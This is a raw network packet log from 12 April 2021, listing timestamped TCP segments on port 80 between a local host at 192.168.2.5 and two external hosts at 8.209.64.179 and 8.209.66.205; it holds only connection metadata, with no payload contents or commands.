Apr 12, 2021 15:12:17.378662109 CEST	49718	80	192.168.2.5	8.209.64.179
Apr 12, 2021 15:12:17.419775963 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.419828892 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.419853926 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.419990063 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.420016050 CEST	49718	80	192.168.2.5	8.209.64.179
Apr 12, 2021 15:12:17.420021057 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.420046091 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.420049906 CEST	49718	80	192.168.2.5	8.209.64.179
Apr 12, 2021 15:12:17.420057058 CEST	49718	80	192.168.2.5	8.209.64.179
Apr 12, 2021 15:12:17.420068979 CEST	49718	80	192.168.2.5	8.209.64.179
Apr 12, 2021 15:12:17.420070887 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.420095921 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.420104027 CEST	49718	80	192.168.2.5	8.209.64.179
Apr 12, 2021 15:12:17.420130968 CEST	49718	80	192.168.2.5	8.209.64.179
Apr 12, 2021 15:12:17.420152903 CEST	49718	80	192.168.2.5	8.209.64.179
Apr 12, 2021 15:12:17.420202971 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.420228958 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.420308113 CEST	49718	80	192.168.2.5	8.209.64.179
Apr 12, 2021 15:12:17.420334101 CEST	49718	80	192.168.2.5	8.209.64.179
Apr 12, 2021 15:12:17.461483002 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.461522102 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.461539030 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.461555004 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.461580992 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.461599112 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.461623907 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.461647987 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.461672068 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.461697102 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.461733103 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.461740971 CEST	49718	80	192.168.2.5	8.209.64.179
Apr 12, 2021 15:12:17.461761951 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.461786032 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.461819887 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.461849928 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.461873055 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.461900949 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.461925030 CEST	49718	80	192.168.2.5	8.209.64.179
Apr 12, 2021 15:12:17.461961985 CEST	49718	80	192.168.2.5	8.209.64.179
Apr 12, 2021 15:12:17.462042093 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.462080002 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.503192902 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.503242970 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.503277063 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.503320932 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.503359079 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.503459930 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.503504992 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.503536940 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.503611088 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.503660917 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.503691912 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.503771067 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.503810883 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.503892899 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.503931999 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.503956079 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.504018068 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.504102945 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.504195929 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.504259109 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.504302025 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.504371881 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.504400969 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.518408060 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.519965887 CEST	49718	80	192.168.2.5	8.209.64.179
Apr 12, 2021 15:12:17.520023108 CEST	49718	80	192.168.2.5	8.209.64.179
Apr 12, 2021 15:12:17.561309099 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:19.601772070 CEST	49719	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.643064976 CEST	80	49719	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.643183947 CEST	49719	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.644112110 CEST	49719	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.718657970 CEST	80	49719	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.718769073 CEST	49719	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.718815088 CEST	80	49719	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.718893051 CEST	49719	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.720226049 CEST	49719	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.724680901 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.762279987 CEST	80	49719	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.765867949 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.766352892 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.769709110 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.834563971 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.834609985 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.834629059 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.834642887 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.834659100 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.834673882 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.834690094 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.834693909 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.834712982 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.834748030 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.834758043 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.834760904 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.834764957 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.834820032 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.834827900 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.876095057 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.876115084 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.876133919 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.876148939 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.876169920 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.876188040 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.876204014 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.876209021 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.876215935 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.876231909 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.876233101 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.876240015 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.876244068 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.876256943 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.876269102 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.876271009 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.876286030 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.876301050 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.876319885 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.876337051 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.876357079 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.876374006 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.876389027 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.876400948 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.876408100 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.876442909 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.876477957 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.876485109 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.876511097 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.876521111 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.917598963 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.917623043 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.917638063 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.917654037 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.917670965 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.917687893 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.917704105 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.917722940 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.917723894 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.917742968 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.917759895 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.917774916 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.917778015 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.917784929 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.917793036 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.917795897 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.917799950 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.917813063 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.917829990 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.917845964 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.917857885 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.917864084 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.917867899 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.917885065 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.917891026 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.917902946 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.917920113 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.917936087 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.917951107 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.917965889 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.917968035 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.917978048 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.917985916 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.917985916 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.918004990 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.918024063 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.918025017 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.918041945 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.918059111 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.918075085 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.918085098 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.918091059 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.918093920 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.918100119 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.918107986 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.918124914 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.918133020 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.918140888 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.918160915 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.918179035 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.918194056 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.918205023 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.918210983 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.918210983 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.918227911 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.918243885 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.918257952 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.918260098 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.918270111 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.918277025 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.918335915 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.918344021 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.959549904 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.959673882 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.959697008 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.959736109 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.959769964 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.959788084 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.959793091 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.959804058 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.959839106 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.959893942 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.959897041 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.959928036 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.959958076 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.959965944 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.960000038 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.960021973 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.960028887 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.960043907 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.960079908 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.960114956 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.960125923 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.960129023 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.960150957 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.960186005 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.960200071 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.960205078 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.960206985 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.960218906 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.960253954 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.960266113 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.960268974 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.960289001 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.960333109 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.960345984 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.960350990 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.960372925 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.960407972 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.960422993 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.960427046 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.960442066 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.960460901 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.960477114 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.960513115 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.960526943 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.960530996 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.960547924 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.960582018 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.960592031 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.960594893 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.960624933 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.960637093 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.960661888 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.960676908 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.960696936 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.960731983 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.960747004 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.960751057 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.960767031 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.960800886 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.960815907 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.960822105 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.960835934 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.960870028 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.960881948 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.960886002 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.960911989 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.960938931 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.960951090 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.960985899 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.960999012 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.961004019 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.961019993 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.961055994 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.961072922 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.961076021 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.961088896 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.961123943 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.961134911 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.961138964 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.961158037 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.961186886 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.961200953 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.961239100 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.961253881 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.961258888 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.961272001 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.961307049 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.961328030 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.961330891 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.961342096 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.961374998 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.961390018 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.961394072 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.961433887 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.961443901 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.961468935 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.961502075 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.961519957 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.961524010 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.961538076 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.961572886 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.961606979 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.961616993 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.961625099 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.961627960 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.961639881 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.961674929 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.961694002 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.961698055 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.961718082 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.961756945 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.961766958 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.961771011 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.961791039 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.961824894 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.961834908 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.961838007 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.961859941 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.961893082 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.961910009 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.961915016 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.961926937 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.961961031 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.961971998 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.961976051 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.962004900 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.962030888 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.962044954 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.962079048 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.962090015 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.962093115 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.962112904 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.962148905 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.962158918 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.962162018 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.962181091 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.962215900 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.962229967 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.962234974 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.962249041 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.962291956 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.962304115 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.962310076 CEST	49720	80	192.168.2.5	8.209.66.205
